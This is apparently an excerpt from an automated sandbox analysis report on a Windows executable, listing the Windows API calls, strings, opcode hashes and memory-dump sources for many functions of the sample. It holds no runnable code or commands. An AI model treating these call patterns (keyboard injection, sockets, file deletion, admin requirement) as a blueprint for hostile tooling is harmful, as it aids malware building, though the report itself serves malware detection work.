                                        • API ID: _wcslen
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 176396367-2734436370
                                        • Opcode ID: a66c66b53beb6e226dc77757628bec269d5a1e8ef54cb0e8b1dd77852ff54b39
                                        • Instruction ID: ff3d3855ffc8a2dafc802af7ccff2267665c9c5c76bd579c6c7e746a35c4ed46
                                        • Opcode Fuzzy Hash: a66c66b53beb6e226dc77757628bec269d5a1e8ef54cb0e8b1dd77852ff54b39
                                        • Instruction Fuzzy Hash: 21213436204210A6C731AA259802EB773D8DFA1311F8040AAFD5997082EF709EDED299
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C83840
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C83850
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C83876
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 69406c336dccf7dfbb66d8006a819748288372b9287ca75d004c78c04d0464b3
                                        • Instruction ID: 2d963eb4f07895717e0942a4acdfe0e35bbe5da63a4d3245516240cc216a44c3
                                        • Opcode Fuzzy Hash: 69406c336dccf7dfbb66d8006a819748288372b9287ca75d004c78c04d0464b3
                                        • Instruction Fuzzy Hash: 4B21F272610118BBEF119F54CC84FBB376EEF89B58F119124F9109B190CA71DD1287A4
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C64A08
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C64A5C
                                        • SetErrorMode.KERNEL32(00000000,?,?,00C8CC08), ref: 00C64AD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: %lu
                                        • API String ID: 2507767853-685833217
                                        • Opcode ID: dcc2ce6152182219e6e9b4de0a848963f7cbfa40c93f3274217a19269ee988d9
                                        • Instruction ID: 7695ee4d04933cd16621590305a62a3772f52338b769aa8ee6fecd983a949453
                                        • Opcode Fuzzy Hash: dcc2ce6152182219e6e9b4de0a848963f7cbfa40c93f3274217a19269ee988d9
                                        • Instruction Fuzzy Hash: B7311E75A00109AFDB14DF54C9C5EAE7BF8EF08308F1480A9E909DB252D771EE45DB61
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C8424F
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C84264
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C84271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 2401218c46c1a2bd945c2c2862849c8a3f160cd6b070b464b5f2221c2179946d
                                        • Instruction ID: 042c3c22a9c790e0d10ac5efa45a3631a30dfc2a1910a13af87cd4c5cffbc8d4
                                        • Opcode Fuzzy Hash: 2401218c46c1a2bd945c2c2862849c8a3f160cd6b070b464b5f2221c2179946d
                                        • Instruction Fuzzy Hash: 53110631244249BEEF20AF39CC46FAB3BACEF95B58F110124FA65E2090D671DC21DB24
                                        APIs
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                          • Part of subcall function 00C52DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C52DC5
                                          • Part of subcall function 00C52DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C52DD6
                                          • Part of subcall function 00C52DA7: GetCurrentThreadId.KERNEL32 ref: 00C52DDD
                                          • Part of subcall function 00C52DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C52DE4
                                        • GetFocus.USER32 ref: 00C52F78
                                          • Part of subcall function 00C52DEE: GetParent.USER32(00000000), ref: 00C52DF9
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C52FC3
                                        • EnumChildWindows.USER32(?,00C5303B), ref: 00C52FEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                        • String ID: %s%d
                                        • API String ID: 1272988791-1110647743
                                        • Opcode ID: 14ce2ea06ce0231a53aab9d9e90dd72411ad4d6fb1f7c93a170d20ef6027bae5
                                        • Instruction ID: b6f8e81666042778e39de64e07513060d1ab3a5a9427ed7be9f28941f5bced0f
                                        • Opcode Fuzzy Hash: 14ce2ea06ce0231a53aab9d9e90dd72411ad4d6fb1f7c93a170d20ef6027bae5
                                        • Instruction Fuzzy Hash: 4C119D796002096BCF547F648CC6FEE37AAEF95305F044075BE099B292DE309A89DB74
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C858C1
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C858EE
                                        • DrawMenuBar.USER32(?), ref: 00C858FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: 585882127cf0259a4fac1707a355a664f93a6b779afa29ee8c2004451876f79c
                                        • Instruction ID: cc96754be70929b95f304ef1ca34780e77f1b95cac602e6577d1a489f074ff22
                                        • Opcode Fuzzy Hash: 585882127cf0259a4fac1707a355a664f93a6b779afa29ee8c2004451876f79c
                                        • Instruction Fuzzy Hash: 0801AD31500208EFDB20AF11DC44BAEBBB4FB45364F0080A9E848D61A1DB708A81EF34
                                        APIs
                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00C4D3BF
                                        • FreeLibrary.KERNEL32 ref: 00C4D3E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 3013587201-2590602151
                                        • Opcode ID: 18b098b88bdc073456484a9398cf4b493625fa55498e47177d7c9d157e8a57af
                                        • Instruction ID: 91f4e214e918e690ec2333b96f0f2afbb1022b774ffb480bfcac69cf3308a164
                                        • Opcode Fuzzy Hash: 18b098b88bdc073456484a9398cf4b493625fa55498e47177d7c9d157e8a57af
                                        • Instruction Fuzzy Hash: 53F05CB190561097D73236018CD8B5D36247F00B00F948198F803F2165D7A0CE8087D2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47326a3e013c854eff610c42fb7a2c560b0e330dba6f3b3e559f5f1de371d7b8
                                        • Instruction ID: e52f39db3304333848a45d95969d983316f77b79bc4e3808473956e45fb38eef
                                        • Opcode Fuzzy Hash: 47326a3e013c854eff610c42fb7a2c560b0e330dba6f3b3e559f5f1de371d7b8
                                        • Instruction Fuzzy Hash: DEC15E79A00206EFDB14CF94C898BAEB7B5FF48305F208598E915EB261D731DE85CB94
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitInitializeUninitialize
                                        • String ID:
                                        • API String ID: 1998397398-0
                                        • Opcode ID: 0068392134e2d7911a39e9d6756db9c8f9b7dbfbf9737188e61e29db8478099f
                                        • Instruction ID: 066cc9fd8ab2f04cf98f59d9013a7c485d29cd053e334b99ae70789f344e48bc
                                        • Opcode Fuzzy Hash: 0068392134e2d7911a39e9d6756db9c8f9b7dbfbf9737188e61e29db8478099f
                                        • Instruction Fuzzy Hash: 91A16B752043049FC710DF28C595A2AB7E5FF88714F04889DF98A9B362DB70EE49DB92
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C8FC08,?), ref: 00C505F0
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C8FC08,?), ref: 00C50608
                                        • CLSIDFromProgID.OLE32(?,?,00000000,00C8CC40,000000FF,?,00000000,00000800,00000000,?,00C8FC08,?), ref: 00C5062D
                                        • _memcmp.LIBVCRUNTIME ref: 00C5064E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 98a61f71166fe418f10cd5aad7b6f1d322dd1b3a0bda66ddf3af1173719574f6
                                        • Instruction ID: 98fd072e2e78e82f5308e467818d5270cf3ddae3520148b46b4faa4782bb952d
                                        • Opcode Fuzzy Hash: 98a61f71166fe418f10cd5aad7b6f1d322dd1b3a0bda66ddf3af1173719574f6
                                        • Instruction Fuzzy Hash: 03813975A00109EFCB04DF94C984EEEB7B9FF89315F204158E916EB250DB71AE4ACB64
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 0b0b288709f90731b51b33e3b59ffc54f8babc19c0e3861dd867a25b017adb64
                                        • Instruction ID: bae816a60a5de2c0b7a8bcff0a4c630aef650c04dfffd772cc62ad46fcf16829
                                        • Opcode Fuzzy Hash: 0b0b288709f90731b51b33e3b59ffc54f8babc19c0e3861dd867a25b017adb64
                                        • Instruction Fuzzy Hash: D6412F31A10510AFDB257BBD9C466FE3AA5EF42370F1C4225FC29D7191E63489817772
                                        APIs
                                        • GetWindowRect.USER32(00F1F740,?), ref: 00C862E2
                                        • ScreenToClient.USER32(?,?), ref: 00C86315
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C86382
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 9f770ade03869f6cee0f3727e8e01d8b29b5c5e45e4da05836e30418690bf443
                                        • Instruction ID: bf8ee6f1f2bf24f9f97601f665218b306e5b3a42a1e90f264dbe4ab0a7a63ae2
                                        • Opcode Fuzzy Hash: 9f770ade03869f6cee0f3727e8e01d8b29b5c5e45e4da05836e30418690bf443
                                        • Instruction Fuzzy Hash: AB512D74A00209EFDF14EF68D880AAE7BB5FF45364F148169F9259B2A1D730EE41CB54
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00C71AFD
                                        • WSAGetLastError.WSOCK32 ref: 00C71B0B
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C71B8A
                                        • WSAGetLastError.WSOCK32 ref: 00C71B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: 71a105b619de400dcdd753ae73b79be6c05f404595971decc1376365aff182c5
                                        • Instruction ID: 27f99a535efba08bebcf23ae11d72e3ae5a6b8b3bcab828a901714bd650fa7b4
                                        • Opcode Fuzzy Hash: 71a105b619de400dcdd753ae73b79be6c05f404595971decc1376365aff182c5
                                        • Instruction Fuzzy Hash: 03417F74640204AFE720AF24C886F3977E5AB44718F58C498FA1A9F2D3D772DD45CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e168eb497d6b364c2f7451971edf85fc9cdd76f015644af18d7b46c451172d2c
                                        • Instruction ID: 1622f2c3a2da8f9c5dde9005a79512d1a38c0738b6cfe45b544efc83600c18cf
                                        • Opcode Fuzzy Hash: e168eb497d6b364c2f7451971edf85fc9cdd76f015644af18d7b46c451172d2c
                                        • Instruction Fuzzy Hash: 4B415B71A00724BFD724EF38DC41BAABBE9EB88710F10452EF451DBA82D3719D419790
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C65783
                                        • GetLastError.KERNEL32(?,00000000), ref: 00C657A9
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C657CE
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C657FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 70c42f3ebe1af14d989304ada6c95d248d64b4158319358666c231ae22e35778
                                        • Instruction ID: 72156ca5ba2eb9d13517766e083e6646790f4528deec668a41f1a52731d5f384
                                        • Opcode Fuzzy Hash: 70c42f3ebe1af14d989304ada6c95d248d64b4158319358666c231ae22e35778
                                        • Instruction Fuzzy Hash: 02415F35210615DFCB20DF15C594A2EBBE2EF59320F1984C8E95A9B362CB74FD48CB91
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C16D71,00000000,00000000,00C182D9,?,00C182D9,?,00000001,00C16D71,8BE85006,00000001,00C182D9,00C182D9), ref: 00C2D910
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C2D999
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C2D9AB
                                        • __freea.LIBCMT ref: 00C2D9B4
                                          • Part of subcall function 00C23820: RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: a17f1e33c645106eb9aab9a77812c363b31fe7fd98f8f1f34bd0ef700cab3495
                                        • Instruction ID: 54b709b9f82cf03f46ef60c2b9f89228e9d20e4252cb16ce6245f8e532fd2474
                                        • Opcode Fuzzy Hash: a17f1e33c645106eb9aab9a77812c363b31fe7fd98f8f1f34bd0ef700cab3495
                                        • Instruction Fuzzy Hash: F531F371A1022AABDF24DF64EC81EEE7BA5EB51310F050168FC15D7250DB35CE90DB90
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00C85352
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C85375
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C85382
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C853A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LongWindow$InvalidateMessageRectSend
                                        • String ID:
                                        • API String ID: 3340791633-0
                                        • Opcode ID: 654b101063d38babcf2a49f2584f569da22bd23f9883efeb42503b668f03abdf
                                        • Instruction ID: 948ee4cdf46e72bce35ccfbd6d0ee77f87ffafddb2ba536976172724de11808c
                                        • Opcode Fuzzy Hash: 654b101063d38babcf2a49f2584f569da22bd23f9883efeb42503b668f03abdf
                                        • Instruction Fuzzy Hash: AE31E234A55A08FFEF30AA14CC45FE83761AB05399F584115FA20961F1C7F0AF40AB59
                                        APIs
                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C5ABF1
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C5AC0D
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C5AC74
                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C5ACC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: bd7d5b70221d571e7760f27b4481ccf6086819c077d0e4b8426d427d8e9c62ab
                                        • Instruction ID: 30e52606af27893f2a8131a46e1af644ee30e205d520e93c4ff77797df8d9b17
                                        • Opcode Fuzzy Hash: bd7d5b70221d571e7760f27b4481ccf6086819c077d0e4b8426d427d8e9c62ab
                                        • Instruction Fuzzy Hash: 29316D34A00318AFFF34CB668C047FE7BA5AB44312F04431EECA1561D0C376AAC9976A
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 00C8769A
                                        • GetWindowRect.USER32(?,?), ref: 00C87710
                                        • PtInRect.USER32(?,?,00C88B89), ref: 00C87720
                                        • MessageBeep.USER32(00000000), ref: 00C8778C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
